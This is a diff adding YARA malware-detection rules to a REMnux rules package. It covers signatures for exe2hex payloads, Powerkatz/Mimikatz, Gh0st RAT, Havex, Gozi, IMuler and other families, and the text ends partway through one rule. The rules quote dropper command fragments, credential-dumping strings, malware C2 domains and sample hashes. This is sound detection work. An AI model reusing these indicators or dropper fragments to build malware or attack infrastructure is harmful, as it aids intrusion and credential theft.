diff -Nru remnux-rules-0.0.3/yara/malware/generic_exe2hex_payload.yar remnux-rules-0.0.4/yara/malware/generic_exe2hex_payload.yar
--- remnux-rules-0.0.3/yara/malware/generic_exe2hex_payload.yar	1970-01-01 00:00:00.000000000 +0000
+++ remnux-rules-0.0.4/yara/malware/generic_exe2hex_payload.yar	2016-06-24 20:07:22.000000000 +0000
@@ -0,0 +1,31 @@
+/*
+    This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as    long as you use it under this license.
+
+*/
+
+/*
+	Yara Rule Set
+	Author: Florian Roth
+	Date: 2016-01-15
+	Identifier: Exe2hex
+*/
+
+rule Payload_Exe2Hex {
+	meta:
+		description = "Detects payload generated by exe2hex"
+		author = "Florian Roth"
+		reference = "https://github.com/g0tmi1k/exe2hex"
+		date = "2016-01-15"
+		score = 70
+	strings:
+		$a1 = "set /p \"=4d5a" ascii
+		$a2 = "powershell -Command \"$hex=" ascii
+		$b1 = "set+%2Fp+%22%3D4d5" ascii
+		$b2 = "powershell+-Command+%22%24hex" ascii
+		$c1 = "echo 4d 5a " ascii
+		$c2 = "echo r cx >>" ascii
+		$d1 = "echo+4d+5a+" ascii
+		$d2 = "echo+r+cx+%3E%3E" ascii
+	condition:
+		all of ($a*) or all of ($b*) or all of ($c*) or all of ($d*)
+}
diff -Nru remnux-rules-0.0.3/yara/malware/Genome.yar remnux-rules-0.0.4/yara/malware/Genome.yar
--- remnux-rules-0.0.3/yara/malware/Genome.yar	1970-01-01 00:00:00.000000000 +0000
+++ remnux-rules-0.0.4/yara/malware/Genome.yar	2016-06-24 20:07:22.000000000 +0000
@@ -0,0 +1,17 @@
+/*
+    This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as
+    long as you use it under this license.
+*/
+rule genome {
+    meta:
+        author = "Brian Wallace @botnet_hunter"
+        author_email = "bwall@ballastsecurity.net"
+        date = "2014-09-07"
+        description = "Identify Genome"
+	strings:
+	    $s1 = "Attempting to create more than one keyboard::Monitor instance"
+        $s2 = "{Right windows}"
+        $s3 = "Access violation - no RTTI data!"
+    condition:
+        all of them
+}
diff -Nru remnux-rules-0.0.3/yara/malware/Gen_powerkatz.yar remnux-rules-0.0.4/yara/malware/Gen_powerkatz.yar
--- remnux-rules-0.0.3/yara/malware/Gen_powerkatz.yar	1970-01-01 00:00:00.000000000 +0000
+++ remnux-rules-0.0.4/yara/malware/Gen_powerkatz.yar	2016-06-24 20:07:22.000000000 +0000
@@ -0,0 +1,34 @@
+/*
+    This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as    long as you use it under this license.
+*/
+
+/*
+	Yara Rule Set
+	Author: Florian Roth
+	Date: 2016-02-05
+	Identifier: Powerkatz
+*/
+
+rule Powerkatz_DLL_Generic {
+	meta:
+		description = "Detects Powerkatz - a Mimikatz version prepared to run in memory via Powershell (overlap with other Mimikatz versions is possible)"
+		author = "Florian Roth"
+		reference = "PowerKatz Analysis"
+		date = "2016-02-05"
+		super_rule = 1
+		score = 80
+		hash1 = "c20f30326fcebad25446cf2e267c341ac34664efad5c50ff07f0738ae2390eae"
+		hash2 = "1e67476281c1ec1cf40e17d7fc28a3ab3250b474ef41cb10a72130990f0be6a0"
+		hash3 = "49e7bac7e0db87bf3f0185e9cf51f2539dbc11384fefced465230c4e5bce0872"
+	strings:
+		$s1 = "%3u - Directory '%s' (*.kirbi)" fullword wide
+		$s2 = "%*s  pPublicKey         : " fullword wide
+		$s3 = "ad_hoc_network_formed" fullword wide
+		$s4 = "<3 eo.oe ~ ANSSI E>" fullword wide
+		$s5 = "\\*.kirbi" fullword wide
+
+		$c1 = "kuhl_m_lsadump_getUsersAndSamKey ; kull_m_registry_RegOpenKeyEx SAM Accounts (0x%08x)" fullword wide
+		$c2 = "kuhl_m_lsadump_getComputerAndSyskey ; kuhl_m_lsadump_getSyskey KO" fullword wide
+	condition:
+		( uint16(0) == 0x5a4d and filesize < 1000KB and 1 of them ) or 2 of them
+}
diff -Nru remnux-rules-0.0.3/yara/malware/Gh0st.yar remnux-rules-0.0.4/yara/malware/Gh0st.yar
--- remnux-rules-0.0.3/yara/malware/Gh0st.yar	1970-01-01 00:00:00.000000000 +0000
+++ remnux-rules-0.0.4/yara/malware/Gh0st.yar	2016-06-24 20:07:22.000000000 +0000
@@ -0,0 +1,70 @@
+/*
+    This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as    long as you use it under this license.
+
+*/
+
+import "pe"
+
+rule APT_WIN_Gh0st_ver
+{
+meta:
+   author = "@BryanNolen"
+   date = "2012-12"
+   type = "APT"
+   version = "1.1"
+   ref = "Detection of Gh0st RAT server DLL component"
+   ref1 = "http://www.mcafee.com/au/resources/white-papers/foundstone/wp-know-your-digital-enemy.pdf"
+ strings:  
+   $library = "deflate 1.1.4 Copyright 1995-2002 Jean-loup Gailly"
+   $capability = "GetClipboardData"
+   $capability1 = "capCreateCaptureWindowA"
+   $capability2 = "CreateRemoteThread"
+   $capability3 = "WriteProcessMemory"
+   $capability4 = "LsaRetrievePrivateData"
+   $capability5 = "AdjustTokenPrivileges"
+   $function = "ResetSSDT"
+   $window = "WinSta0\\Default"
+   $magic = {47 6C 6F 62 61 6C 5C [5-9] 20 25 64}    /* $magic = "Gh0st" */
+ condition:
+   all of them
+}
+
+rule Gh0st
+{
+    meta:
+        description = "Gh0st"
+	author = "botherder https://github.com/botherder"
+
+    strings:
+        $ = /(G)host/
+        $ = /(i)nflate 1\.1\.4 Copyright 1995-2002 Mark Adler/
+        $ = /(d)eflate 1\.1\.4 Copyright 1995-2002 Jean-loup Gailly/
+        $ = /(%)s\\shell\\open\\command/
+        $ = /(G)etClipboardData/
+        $ = /(W)riteProcessMemory/
+        $ = /(A)djustTokenPrivileges/
+        $ = /(W)inSta0\\Default/
+        $ = /(#)32770/
+        $ = /(#)32771/
+        $ = /(#)32772/
+        $ = /(#)32774/
+
+    condition:
+        all of them
+}
+
+rule gh0st
+
+{
+
+meta:
+	author = "https://github.com/jackcr/"
+
+   strings:
+      $a = { 47 68 30 73 74 ?? ?? ?? ?? ?? ?? ?? ?? 78 9C }
+      $b = "Gh0st Update"
+
+   condition:
+      any of them
+
+}
diff -Nru remnux-rules-0.0.3/yara/malware/Gholee.yar remnux-rules-0.0.4/yara/malware/Gholee.yar
--- remnux-rules-0.0.3/yara/malware/Gholee.yar	1970-01-01 00:00:00.000000000 +0000
+++ remnux-rules-0.0.4/yara/malware/Gholee.yar	2016-06-24 20:07:22.000000000 +0000
@@ -0,0 +1,107 @@
+/*
+    This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as    long as you use it under this license.
+
+*/
+
+import "pe"
+
+rule gholeeV1
+{
+    meta:
+	 Author = "@GelosSnake"
+    	 Date = "2014/08"
+    	 Description = "Gholee first discovered variant "
+	 Reference = "http://securityaffairs.co/wordpress/28170/cyber-crime/gholee-malware.html" 
+
+    strings:
+    	 $a = "sandbox_avg10_vc9_SP1_2011"
+    	 $b = "gholee"
+
+    condition:
+    	 all of them
+}
+
+rule gholeeV2
+{
+   meta:
+	Author = "@GelosSnake"
+	Date = "2015-02-12"
+    	Description = "Gholee first discovered variant "
+	Reference = "http://securityaffairs.co/wordpress/28170/cyber-crime/gholee-malware.html" 
+
+   strings:
+	$string0 = "RichHa"
+	$string1 = "         (((((                  H" wide
+	$string2 = "1$1,141<1D1L1T1\\1d1l1t1"
+	$string3 = "<8;$O' "
+	$string4 = "@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]"
+	$string5 = "jYPQTVTSkllZTTXRTUiHceWda/"
+	$string6 = "urn:schemas-microsoft-com:asm.v1"
+	$string7 = "8.848H8O8i8s8y8"
+	$string8 = "wrapper3" wide
+	$string9 = "pwwwwwwww"
+	$string10 = "Sunday"
+	$string11 = "YYuTVWh"
+	$string12 = "DDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDIN"
+	$string13 = "ytMMMMMMUbbrrrrrxxxxxxxxrriUMMMMMMMMMUuzt"
+	$string15 = "wrapper3 Version 1.0" wide
+	$string16 = "77A779"
+	$string17 = "<C<G<M<R<X<"
+	$string18 = "9 9-9N9X9s9"
+
+    condition:
+	18 of them
+}
+
+rule MW_gholee_v1 : v1
+{
+meta:
+    Author = "@GelosSnake"
+    description = "http://securityaffairs.co/wordpress/28170/cyber-crime/gholee-malware.html"
+    date = "2014-08"
+    maltype = "Remote Access Trojan"
+    sample_filetype = "dll"
+    hash0 = "48573a150562c57742230583456b4c02"
+   
+strings:
+    $a = "sandbox_avg10_vc9_SP1_2011"
+    $b = "gholee"
+   
+condition:
+    all of them
+}
+ 
+rule MW_gholee_v2 : v2
+{
+meta:
+        author = "@GelosSnake"
+        date = "2015-02-12"
+        description = "http://securityaffairs.co/wordpress/28170/cyber-crime/gholee-malware.html"
+        hash0 = "05523761ca296ec09afdf79477e5f18d"
+        hash1 = "08e424ac42e6efa361eccefdf3c13b21"
+        hash2 = "5730f925145f1a1cd8380197e01d9e06"
+        hash3 = "73461c8578dd9ab86d42984f30c04610"
+        sample_filetype = "dll"
+strings:
+        $string0 = "RichHa"
+        $string1 = "         (((((                  H" wide
+        $string2 = "1$1,141<1D1L1T1\\1d1l1t1"
+        $string3 = "<8;$O' "
+        $string4 = "@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]"
+        $string5 = "jYPQTVTSkllZTTXRTUiHceWda/"
+        $string6 = "urn:schemas-microsoft-com:asm.v1"
+        $string7 = "8.848H8O8i8s8y8"
+        $string8 = "wrapper3" wide
+        $string9 = "pwwwwwwww"
+        $string10 = "Sunday"
+        $string11 = "YYuTVWh"
+        $string12 = "DDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDIN"
+        $string13 = "ytMMMMMMUbbrrrrrxxxxxxxxrriUMMMMMMMMMUuzt"
+        $string15 = "wrapper3 Version 1.0" wide
+        $string16 = "77A779"
+        $string17 = "<C<G<M<R<X<"
+        $string18 = "9 9-9N9X9s9"
+condition:
+        18 of them
+}
+
diff -Nru remnux-rules-0.0.3/yara/malware/Glasses.yar remnux-rules-0.0.4/yara/malware/Glasses.yar
--- remnux-rules-0.0.3/yara/malware/Glasses.yar	1970-01-01 00:00:00.000000000 +0000
+++ remnux-rules-0.0.4/yara/malware/Glasses.yar	2016-06-24 20:07:22.000000000 +0000
@@ -0,0 +1,50 @@
+/*
+    This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as    long as you use it under this license.
+
+*/
+
+import "pe"
+
+rule GlassesCode : Glasses Family 
+{
+    meta:
+        description = "Glasses code features"
+        author = "Seth Hardy"
+        last_modified = "2014-07-22"
+        
+    strings:
+        $ = { B8 AB AA AA AA F7 E1 D1 EA 8D 04 52 2B C8 }
+        $ = { B8 56 55 55 55 F7 E9 8B 4C 24 1C 8B C2 C1 E8 1F 03 D0 49 3B CA }
+        
+    condition:
+        any of them
+}
+
+rule GlassesStrings : Glasses Family
+{
+    meta:
+        description = "Strings used by Glasses"
+        author = "Seth Hardy"
+        last_modified = "2014-07-22"
+        
+    strings:
+        $ = "thequickbrownfxjmpsvalzydg"
+        $ = "Mozilla/4.0 (compatible; Windows NT 5.1; MSIE 7.0; Trident/4.0; %s.%s)"
+        $ = "\" target=\"NewRef\"></a>"
+ 
+    condition:
+        all of them
+
+}
+
+rule Glasses : Family
+{
+    meta:
+        description = "Glasses family"
+        author = "Seth Hardy"
+        last_modified = "2014-07-22"
+   
+    condition:
+        GlassesCode or GlassesStrings
+        
+}
diff -Nru remnux-rules-0.0.3/yara/malware/GlassRAT.yar remnux-rules-0.0.4/yara/malware/GlassRAT.yar
--- remnux-rules-0.0.3/yara/malware/GlassRAT.yar	1970-01-01 00:00:00.000000000 +0000
+++ remnux-rules-0.0.4/yara/malware/GlassRAT.yar	2016-06-24 20:07:22.000000000 +0000
@@ -0,0 +1,17 @@
+/*
+    This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as
+    long as you use it under this license.
+*/
+rule glassrat
+{
+   meta:
+        author = "Brian Wallace @botnet_hunter"
+   strings:
+    	$a = "PostQuitMessage"
+        $b = "pwlfnn10,gzg"
+        $c = "update.dll"
+        $d = "_winver"
+   condition:
+    	all of them
+
+}
diff -Nru remnux-rules-0.0.3/yara/malware/Gozi_Family.yar remnux-rules-0.0.4/yara/malware/Gozi_Family.yar
--- remnux-rules-0.0.3/yara/malware/Gozi_Family.yar	1970-01-01 00:00:00.000000000 +0000
+++ remnux-rules-0.0.4/yara/malware/Gozi_Family.yar	2016-06-24 20:07:22.000000000 +0000
@@ -0,0 +1,15 @@
+/*
+    This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as    long as you use it under this license.
+
+*/
+rule GoziRule : Gozi Family {
+meta:
+    description = "Win32.Gozi"
+    author = "CCN-CERT"
+    version = "1.0"
+    ref = "https://www.ccn-cert.cni.es/informes/informes-ccn-cert-publicos.html"
+strings:
+    $ = {63 00 6F 00 6F 00 6B 00 69 00 65 00 73 00 2E 00 73 00 71 00 6C 00 69 00 74 00 65 00 2D 00 6A 00 6F 00 75 00 72 00 6E 00 61 00 6C 00 00 00 4F 50 45 52 41 2E 45 58 45 00}
+condition:
+    all of them
+}
diff -Nru remnux-rules-0.0.3/yara/malware/Grozlex.yar remnux-rules-0.0.4/yara/malware/Grozlex.yar
--- remnux-rules-0.0.3/yara/malware/Grozlex.yar	1970-01-01 00:00:00.000000000 +0000
+++ remnux-rules-0.0.4/yara/malware/Grozlex.yar	2016-06-24 20:07:22.000000000 +0000
@@ -0,0 +1,20 @@
+/*
+    This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as    long as you use it under this license.
+
+*/
+
+import "pe"
+
+rule Grozlex : Stealer
+{
+	meta:
+		author="Kevin Falcoz"
+		date="20/08/2013"
+		description="Grozlex Stealer - Possible HCStealer"
+		
+	strings:
+		$signature={4C 00 6F 00 67 00 73 00 20 00 61 00 74 00 74 00 61 00 63 00 68 00 65 00 64 00 20 00 62 00 79 00 20 00 69 00 43 00 6F 00 7A 00 65 00 6E}
+	
+	condition:
+		$signature
+}
diff -Nru remnux-rules-0.0.3/yara/malware/Havex_Memdump.yar remnux-rules-0.0.4/yara/malware/Havex_Memdump.yar
--- remnux-rules-0.0.3/yara/malware/Havex_Memdump.yar	1970-01-01 00:00:00.000000000 +0000
+++ remnux-rules-0.0.4/yara/malware/Havex_Memdump.yar	2016-06-24 20:07:22.000000000 +0000
@@ -0,0 +1,26 @@
+/*
+    This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as    long as you use it under this license.
+
+*/
+rule SANS_ICS_Cybersecurity_Challenge_400_Havex_Memdump
+	{
+	meta:
+		description = "Detects Havex Windows process executable from memory dump"
+		date = "2015-12-2"
+		author = "Chris Sistrunk"
+		hash = "8065674de8d79d1c0e7b3baf81246e7d"
+	strings:
+		$magic = { 4d 5a }	
+	
+	        $s1 = "~tracedscn.yls" fullword wide
+		$s2 = "[!]Start" fullword wide
+		$s3 = "[+]Get WSADATA" fullword wide
+		$s4 = "[-]Can not get local ip" fullword wide
+		$s5 = "[+]Local:" fullword wide
+		$s6 = "[-]Threads number > Hosts number" fullword wide
+		$s7 = "[-]Connection error" fullword wide
+		
+		$x1 = "bddd4e2b84fa2ad61eb065e7797270ff.exe" fullword wide
+	condition:
+	    $magic at 0 and ( 3 of ($s*) or $x1 )
+}
diff -Nru remnux-rules-0.0.3/yara/malware/Havex.yar remnux-rules-0.0.4/yara/malware/Havex.yar
--- remnux-rules-0.0.3/yara/malware/Havex.yar	1970-01-01 00:00:00.000000000 +0000
+++ remnux-rules-0.0.4/yara/malware/Havex.yar	2016-06-24 20:07:22.000000000 +0000
@@ -0,0 +1,71 @@
+/*
+    This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as    long as you use it under this license.
+
+*/
+
+import "pe"
+
+
+rule Win32OPCHavex
+{
+    meta:
+        Author      = "BAE Systems"
+        Date        = "2014/06/23"
+        Description = "Rule for identifying OPC version of HAVEX"
+        Reference   = "www.f-secure.com/weblog/archives/00002718.html"
+
+    strings:
+        $mzhdr = "MZ"
+        $dll = "7CFC52CD3F87.dll"
+        $a1 = "Start finging of LAN hosts..." wide
+        $a2 = "Finding was fault. Unexpective error" wide
+        $a3 = "Was found %i hosts in LAN:" wide
+        $a4 = "Hosts was't found." wide
+        $a5 = "Start finging of OPC Servers..." wide
+        $a6 = "Was found %i OPC Servers." wide
+        $a7 = "OPC Servers not found. Programm finished" wide
+        $a8 = "%s[%s]!!!EXEPTION %i!!!" wide
+        $a9 = "Start finging of OPC Tags..." wide
+
+    condition:
+        $mzhdr at 0 and ($dll or (any of ($a*)))
+}
+
+rule Win32FertgerHavex
+{
+    meta:
+        Author      = "BAE Systems"
+        Date        = "2014/06/23"
+        Description = "Rule for identifying Fertger version of HAVEX"
+        Reference   = "www.f-secure.com/weblog/archives/00002718.html"
+
+    strings:
+        $mz = "MZ"
+        $a1="\\\\.\\pipe\\mypipe-f" wide
+        $a2="\\\\.\\pipe\\mypipe-h" wide
+        $a3="\\qln.dbx" wide
+        $a4="*.yls" wide
+        $a5="\\*.xmd" wide
+        $a6="fertger" wide
+        $a7="havex"
+    
+    condition:
+        $mz at 0 and 3 of ($a*) 
+}
+
+rule Havex_Trojan_PHP_Server
+{
+    meta:
+        Author      = "Florian Roth"
+        Date        = "2014/06/24"
+        Description = "Detects the PHP server component of the Havex RAT"
+        Reference   = "www.f-secure.com/weblog/archives/00002718.html"
+
+    strings:
+        $s1 = "havex--></body></head>"
+        $s2 = "ANSWERTAG_START"
+        $s3 = "PATH_BLOCKFILE"
+
+    condition:
+        all of them
+} 
diff -Nru remnux-rules-0.0.3/yara/malware/Hsdfihdf_banking_malware.yar remnux-rules-0.0.4/yara/malware/Hsdfihdf_banking_malware.yar
--- remnux-rules-0.0.3/yara/malware/Hsdfihdf_banking_malware.yar	1970-01-01 00:00:00.000000000 +0000
+++ remnux-rules-0.0.4/yara/malware/Hsdfihdf_banking_malware.yar	2016-06-24 20:07:22.000000000 +0000
@@ -0,0 +1,42 @@
+/*
+    This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as    long as you use it under this license.
+*/
+rule Hsdfihdf: banking malware 
+{
+meta:
+	author = "Adam Ziaja <adam@adamziaja.com> http://adamziaja.com"
+	date = "2014-04-06"
+	description = "Polish banking malware"
+	hash0 = "db1675c74a444fd35383d9a45631cada"
+	hash1 = "f48ba39df38056449a3e9a1a7289f657"
+	filetype = "exe"
+strings:
+	$s0 = "ANSI_CHARSET"
+	$s1 = "][Vee_d_["
+	$s2 = "qfcD:6<"
+	$s3 = "%-%/%1%3%5%7%9%;%"
+	$s4 = "imhzxsc\\WWKD<.)w"
+	$s5 = "Vzlarf\\]VOZVMskf"
+	$s6 = "JKWFAp\\Z"
+	$s7 = "<aLLwhg"
+	$s8 = "bdLeftToRight"
+	$s9 = "F/.pTC7"
+	$s10 = "O><8,)-$ "
+	$s11 = "mjeUB>D.'8)5\\\\vhe["
+	$s12 = "JGiVRk[W]PL("
+	$s13 = "zwWNNG:8"
+	$s14 = "zv7,'$"
+	$a0 = "#hsdfihdf"
+	$a1 = "polska.irc.pl"
+	$b0 = "firehim@o2.pl"
+	$b1 = "firehim@go2.pl"
+	$b2 = "firehim@tlen.pl"
+	$c0 = "cyberpunks.pl"
+	$c1 = "kaper.phrack.pl"
+	$c2 = "serwer.uk.to"
+	$c3 = "ns1.ipv4.hu"
+	$c4 = "scorebot.koth.hu"
+	$c5 = "esopoland.pl"
+condition:
+	14 of ($s*) or all of ($a*) or 1 of ($b*) or 2 of ($c*)
+}
diff -Nru remnux-rules-0.0.3/yara/malware/iexpl0ree.yar remnux-rules-0.0.4/yara/malware/iexpl0ree.yar
--- remnux-rules-0.0.3/yara/malware/iexpl0ree.yar	1970-01-01 00:00:00.000000000 +0000
+++ remnux-rules-0.0.4/yara/malware/iexpl0ree.yar	2016-06-24 20:07:22.000000000 +0000
@@ -0,0 +1,66 @@
+/*
+    This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as    long as you use it under this license.
+
+*/
+
+import "pe"
+
+rule iexpl0reCode : iexpl0ree Family 
+{
+    meta:
+        description = "iexpl0re code features"
+        author = "Seth Hardy"
+        last_modified = "2014-07-21"
+        
+    strings:
+        $ = { 47 83 FF 64 0F 8C 6D FF FF FF 33 C0 5F 5E 5B C9 C3 }
+        $ = { 80 74 0D A4 44 41 3B C8 7C F6 68 04 01 00 00 }
+        $ = { 8A C1 B2 07 F6 EA 30 04 31 41 3B 4D 10 7C F1 }
+        $ = { 47 83 FF 64 0F 8C 79 FF FF FF 33 C0 5F 5E 5B C9 C3 }
+        // 88h decrypt
+        $ = { 68 88 00 00 00 68 90 06 00 00 68 ?? ?? ?? ?? 89 3? E8 }
+        $ = { BB 88 00 00 00 53 68 90 06 00 00 68 ?? ?? ?? ?? 89 3? E8 }
+        
+    condition:
+        any of them
+}
+
+rule iexpl0reStrings : iexpl0re Family
+{
+    meta:
+        description = "Strings used by iexpl0re"
+        author = "Seth Hardy"
+        last_modified = "2014-07-21"
+        
+    strings:
+        $ = "%USERPROFILE%\\IEXPL0RE.EXE"
+        $ = "\"<770j (("
+        $ = "\\Users\\%s\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\IEXPL0RE.LNK"
+        $ = "\\Documents and Settings\\%s\\Application Data\\Microsoft\\Internet Explorer\\IEXPL0RE.EXE"
+        $ = "LoaderV5.dll"
+        // stage 2
+        $ = "POST /index%0.9d.asp HTTP/1.1"
+        $ = "GET /search?n=%0.9d&"
+        $ = "DUDE_AM_I_SHARP-3.14159265358979x6.626176"
+        $ = "WHO_A_R_E_YOU?2.99792458x1.25663706143592"
+        $ = "BASTARD_&&_BITCHES_%0.8x"
+        $ = "c:\\bbb\\eee.txt"
+        
+    condition:
+        any of them
+
+}
+
+rule iexpl0re : Family
+{
+    meta:
+        description = "iexpl0re family"
+        author = "Seth Hardy"
+        last_modified = "2014-07-21"
+   
+    condition:
+        iexpl0reCode or iexpl0reStrings
+        
+}
+
+
diff -Nru remnux-rules-0.0.3/yara/malware/IMuler.yar remnux-rules-0.0.4/yara/malware/IMuler.yar
--- remnux-rules-0.0.3/yara/malware/IMuler.yar	1970-01-01 00:00:00.000000000 +0000
+++ remnux-rules-0.0.4/yara/malware/IMuler.yar	2016-06-24 20:07:22.000000000 +0000
@@ -0,0 +1,67 @@
+/*
+    This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as    long as you use it under this license.
+
+*/
+
+import "pe"
+
+rule IMulerCode : IMuler Family 
+{
+    meta:
+        description = "IMuler code tricks"
+        author = "Seth Hardy"
+        last_modified = "2014-06-16"
+        
+    strings:
+        // Load these function strings 4 characters at a time. These check the first two blocks:
+        $L4_tmpSpotlight = { C7 ?? 2F 74 6D 70 C7 ?? 04 2F 53 70 6F }
+        $L4_TMPAAABBB = { C7 ?? ?? ?? ?? ?? 54 4D 50 41 C7 ?? ?? ?? ?? ?? 41 41 42 42 }
+        $L4_FILEAGENTVer = { C7 ?? 46 49 4C 45 C7 ?? 04 41 47 45 4E }
+        $L4_TMP0M34JDF8 = { C7 ?? ?? ?? ?? ?? 54 4D 50 30 C7 ?? ?? ?? ?? ?? 4D 33 34 4A }
+        $L4_tmpmdworker = { C7 ?? 2F 74 6D 70 C7 ?? 04 2F 2E 6D 64 }
+        
+    condition:
+        any of ($L4*)
+}
+
+rule IMulerStrings : IMuler Family
+{
+    meta:
+        description = "IMuler Identifying Strings"
+        author = "Seth Hardy"
+        last_modified = "2014-06-16"
+        
+    strings:
+        $ = "/cgi-mac/"
+        $ = "xnocz1"
+        $ = "checkvir.plist"
+        $ = "/Users/apple/Documents/mac back"
+        $ = "iMuler2"
+        $ = "/Users/imac/Desktop/macback/"
+        $ = "xntaskz.gz"
+        $ = "2wmsetstatus.cgi"
+        $ = "launch-0rp.dat"
+        $ = "2wmupload.cgi"
+        $ = "xntmpz"
+        $ = "2wmrecvdata.cgi"
+        $ = "xnorz6"
+        $ = "2wmdelfile.cgi"
+        $ = "/LanchAgents/checkvir"
+        $ = "0PERA:%s"
+        $ = "/tmp/Spotlight"
+        $ = "/tmp/launch-ICS000"
+        
+    condition:
+        any of them
+}
+
+rule IMuler : Family
+{
+    meta:
+        description = "IMuler"
+        author = "Seth Hardy"
+        last_modified = "2014-06-16"
+        
+    condition:
+        IMulerCode or IMulerStrings
+}
diff -Nru remnux-rules-0.0.3/yara/malware/inocnation.yar remnux-rules-0.0.4/yara/malware/inocnation.yar
--- remnux-rules-0.0.3/yara/malware/inocnation.yar	1970-01-01 00:00:00.000000000 +0000
+++ remnux-rules-0.0.4/yara/malware/inocnation.yar	2016-06-24 20:07:22.000000000 +0000
@@ -0,0 +1,33 @@
+/*
+    This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as    long as you use it under this license.
+
+*/
+rule apt_win32_dll_rat_1a53b0cp32e46g0qio7
+{
+	meta:
+		author = "https://www.fidelissecurity.com/"
+        	info = "Indicators for FTA-1020"
+		hash1 = "75d3d1f23628122a64a2f1b7ef33f5cf"
+		hash2 = "d9821468315ccd3b9ea03161566ef18e"
+		hash3 = "b9af5f5fd434a65d7aa1b55f5441c90a"
+		reference = "https://github.com/fideliscyber"
+	strings:
+    	// Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0;rv:11.0) like Gecko
+		$ = { c7 [2] 64 00 63 00 c7 [2] 69 00 62 00 c7 [2] 7a 00 7e 00 c7 [2] 2d 00 43 00 c7 [2] 59 00 2d 00 c7 [2] 3b 00 23 00 c7 [2] 3e 00 36 00 c7 [2] 2d 00 5a 00 c7 [2] 42 00 5a 00 c7 [2] 3b 00 39 00 c7 [2] 36 00 2d 00 c7 [2] 59 00 7f 00 c7 [2] 64 00 69 00 c7 [2] 68 00 63 00 c7 [2] 79 00 22 00 c7 [2] 3a 00 23 00 c7 [2] 3d 00 36 00 c7 [2] 2d 00 7f 00 c7 [2] 7b 00 37 00 c7 [2] 3c 00 3c 00 c7 [2] 23 00 3d 00 c7 [2] 24 00 2d 00 c7 [2] 61 00 64 00 c7 [2] 66 00 68 00 c7 [2] 2d 00 4a 00 c7 [2] 68 00 6e 00 c7 [2] 66 00 62 00 } // offset 10001566
+	// Software\Microsoft\Windows\CurrentVersion\Run
+       $ = { c7 [2] 23 00 24 00 c7 [2] 24 00 33 00 c7 [2] 38 00 22 00 c7 [2] 00 00 33 00 c7 [2] 24 00 25 00 c7 [2] 3f 00 39 00 c7 [2] 38 00 0a 00 c7 [2] 04 00 23 00 c7 [2] 38 00 00 00 c7 [2] 43 00 66 00 c7 [2] 6d 00 60 00 c7 [2] 67 00 52 00 c7 [2] 6e 00 63 00 c7 [2] 7b 00 67 00 c7 [2] 70 00 00 00 c7 [2] 43 00 4d 00 c7 [2] 44 00 00 00 c7 [2] 0f 00 43 00 c7 [2] 00 00 50 00 c7 [2] 49 00 4e 00 c7 [2] 47 00 00 00 c7 [2] 11 00 12 00 c7 [2] 17 00 0e 00 c7 [2] 10 00 0e 00 c7 [2] 10 00 0e 00 c7 [2] 11 00 06 00 c7 [2] 44 00 45 00 c7 [2] 4c 00 00 00 } // 10003D09
+	$ = { 66 [4-7] 0d 40 83 f8 44 7c ?? }
+       // xor		word ptr [ebp+eax*2+var_5C], 14h
+	// inc		eax
+	// cmp     	eax, 14h
+       // Loop to decode a static string. It reveals the "1a53b0cp32e46g0qio9" static string sent in the beacon
+	$ = { 66 [4-7] 14 40 83 f8 14 7c ?? } // 100017F0
+	$ = { 66 [4-7] 56 40 83 f8 2d 7c ?? } // 10003621
+	$ = { 66 [4-7] 20 40 83 f8 1a 7c ?? } // 10003640
+	$ = { 80 [2-7] 2e 40 3d 50 02 00 00 72 ?? } //  10003930
+	$ = "%08x%08x%08x%08x" wide ascii
+	$ = "WinHttpGetIEProxyConfigForCurrentUser" wide ascii
+
+	condition:
+	(uint16(0) == 0x5A4D or uint32(0) == 0x4464c457f) and (all of them)
+}
diff -Nru remnux-rules-0.0.3/yara/malware/Install11.yar remnux-rules-0.0.4/yara/malware/Install11.yar
--- remnux-rules-0.0.3/yara/malware/Install11.yar	1970-01-01 00:00:00.000000000 +0000
+++ remnux-rules-0.0.4/yara/malware/Install11.yar	2016-06-24 20:07:22.000000000 +0000
@@ -0,0 +1,50 @@
+/*
+    This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as    long as you use it under this license.
+
+*/
+
+import "pe"
+
+rule Insta11Code : Insta11 Family 
+{
+    meta:
+        description = "Insta11 code features"
+        author = "Seth Hardy"
+        last_modified = "2014-06-23"
+    
+    strings:
+        // jmp $+5; push 423h
+        $jumpandpush = { E9 00 00 00 00 68 23 04 00 00 }
+    
+    condition:
